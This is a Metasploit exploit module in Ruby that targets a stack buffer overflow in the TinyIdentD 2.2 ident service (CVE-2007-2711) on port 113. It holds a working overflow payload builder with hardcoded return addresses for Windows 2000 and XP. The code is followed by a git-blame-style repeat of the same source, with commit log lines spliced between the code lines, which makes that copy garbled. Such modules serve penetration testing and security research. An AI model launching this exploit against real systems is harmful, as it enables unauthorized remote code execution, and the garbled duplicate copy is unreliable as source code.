metasploit-framework/modules/exploits/windows/misc/tiny_identd_overflow.rb

##
# $Id$
##

##
# This file is part of the Metasploit Framework and may be subject to 
# redistribution and commercial restrictions. Please see the Metasploit
# Framework web site for more information on licensing and terms of use.
# http://metasploit.com/framework/
##


require 'msf/core'


class Metasploit3 < Msf::Exploit::Remote

	include Msf::Exploit::Remote::Tcp

	def initialize(info = {})
		super(update_info(info,
			'Name'           => 'TinyIdentD 2.2 Stack Overflow',
			'Description'    => %q{
				This module exploits a stack based buffer overflow in TinyIdentD version 2.2.
				If we send a long string to the ident service we can overwrite the return
				address and execute arbitrary code. Credit to Maarten Boone. 
			},
			'Author'         => 'Jacopo Cervini <acaro[at]jervus.it>',
			'Version'        => '$Revision$',
			'References'     => 
				[
				    	['CVE', '2007-2711'],
					['OSVDB', '36053'],
					['BID', '23981'],
				],
			'Payload'        =>
				{
					'Space'    => 400,
					'BadChars' => "\x00\x0d\x20\x0a"
				},
			'Platform'       => 'win',
			'Targets'        =>
				[
					['Windows 2000 Server SP4 English',   { 'Ret' => 0x7c2d15e7, } ], # call esi 
					['Windows XP SP2 Italian',            { 'Ret' => 0x77f46eda, } ], # call esi 
					
				],

			'Privileged'     => false,
			'DisclosureDate' => 'May 14 2007'
			))

			register_options([ Opt::RPORT(113) ], self.class)
	end

	def exploit
		connect

		pattern  = "\xeb\x20"+", 28 : USERID : UNIX :";
		pattern << make_nops(0x1eb - payload.encoded.length)
		pattern << payload.encoded
		pattern << [ target.ret ].pack('V')
		

		request  = pattern + "\n"

		print_status("Trying #{target.name} using address at #{"0x%.8x" % target.ret }...")

		sock.put(request)
		

		handler
		disconnect
	end

end
Adding svn:keywords to new modules, adding identd/gamsoft modules git-svn-id: file:///home/svn/framework3/trunk@4961 4d416f70-5f16-0410-b530-b9f4589650da 2007-05-22 21:15:14 +00:00			`##`
			`# $Id$`
			`##`

			`##`
			`# This file is part of the Metasploit Framework and may be subject to`
			`# redistribution and commercial restrictions. Please see the Metasploit`
			`# Framework web site for more information on licensing and terms of use.`
replacing defunct framework URL in header comments in most modules and pcap_log git-svn-id: file:///home/svn/framework3/trunk@6479 4d416f70-5f16-0410-b530-b9f4589650da 2009-04-13 14:33:26 +00:00			`# http://metasploit.com/framework/`
Adding svn:keywords to new modules, adding identd/gamsoft modules git-svn-id: file:///home/svn/framework3/trunk@4961 4d416f70-5f16-0410-b530-b9f4589650da 2007-05-22 21:15:14 +00:00			`##`


			`require 'msf/core'`


This massive commit changes the metasploit 3 module format. The new syntax allows for greater scalability and future improvements to the metasploit module loader. This change also makes it easier for users to add new modules, since the class name no longer needs to match the directory structure. git-svn-id: file:///home/svn/framework3/trunk@5709 4d416f70-5f16-0410-b530-b9f4589650da 2008-10-02 05:23:59 +00:00			`class Metasploit3 < Msf::Exploit::Remote`
Adding svn:keywords to new modules, adding identd/gamsoft modules git-svn-id: file:///home/svn/framework3/trunk@4961 4d416f70-5f16-0410-b530-b9f4589650da 2007-05-22 21:15:14 +00:00
This massive commit changes the metasploit 3 module format. The new syntax allows for greater scalability and future improvements to the metasploit module loader. This change also makes it easier for users to add new modules, since the class name no longer needs to match the directory structure. git-svn-id: file:///home/svn/framework3/trunk@5709 4d416f70-5f16-0410-b530-b9f4589650da 2008-10-02 05:23:59 +00:00			`include Msf::Exploit::Remote::Tcp`
Adding svn:keywords to new modules, adding identd/gamsoft modules git-svn-id: file:///home/svn/framework3/trunk@4961 4d416f70-5f16-0410-b530-b9f4589650da 2007-05-22 21:15:14 +00:00
			`def initialize(info = {})`
			`super(update_info(info,`
			`'Name' => 'TinyIdentD 2.2 Stack Overflow',`
			`'Description' => %q{`
			`This module exploits a stack based buffer overflow in TinyIdentD version 2.2.`
			`If we send a long string to the ident service we can overwrite the return`
			`address and execute arbitrary code. Credit to Maarten Boone.`
			`},`
			`'Author' => 'Jacopo Cervini <acaro[at]jervus.it>',`
			`'Version' => '$Revision$',`
			`'References' =>`
			`[`
Updated osvdb references from Steve Tornio, updated capture/eth_spoof modules git-svn-id: file:///home/svn/framework3/trunk@6907 4d416f70-5f16-0410-b530-b9f4589650da 2009-07-27 14:05:23 +00:00			`['CVE', '2007-2711'],`
			`['OSVDB', '36053'],`
Adding svn:keywords to new modules, adding identd/gamsoft modules git-svn-id: file:///home/svn/framework3/trunk@4961 4d416f70-5f16-0410-b530-b9f4589650da 2007-05-22 21:15:14 +00:00			`['BID', '23981'],`
			`],`
			`'Payload' =>`
			`{`
			`'Space' => 400,`
			`'BadChars' => "\x00\x0d\x20\x0a"`
			`},`
			`'Platform' => 'win',`
			`'Targets' =>`
			`[`
			`['Windows 2000 Server SP4 English', { 'Ret' => 0x7c2d15e7, } ], # call esi`
			`['Windows XP SP2 Italian', { 'Ret' => 0x77f46eda, } ], # call esi`

			`],`

			`'Privileged' => false,`
			`'DisclosureDate' => 'May 14 2007'`
			`))`

			`register_options([ Opt::RPORT(113) ], self.class)`
			`end`

			`def exploit`
			`connect`

			`pattern = "\xeb\x20"+", 28 : USERID : UNIX :";`
			`pattern << make_nops(0x1eb - payload.encoded.length)`
			`pattern << payload.encoded`
			`pattern << [ target.ret ].pack('V')`


			`request = pattern + "\n"`

			`print_status("Trying #{target.name} using address at #{"0x%.8x" % target.ret }...")`

			`sock.put(request)`


			`handler`
			`disconnect`
			`end`

Updated osvdb references from Steve Tornio, updated capture/eth_spoof modules git-svn-id: file:///home/svn/framework3/trunk@6907 4d416f70-5f16-0410-b530-b9f4589650da 2009-07-27 14:05:23 +00:00			`end`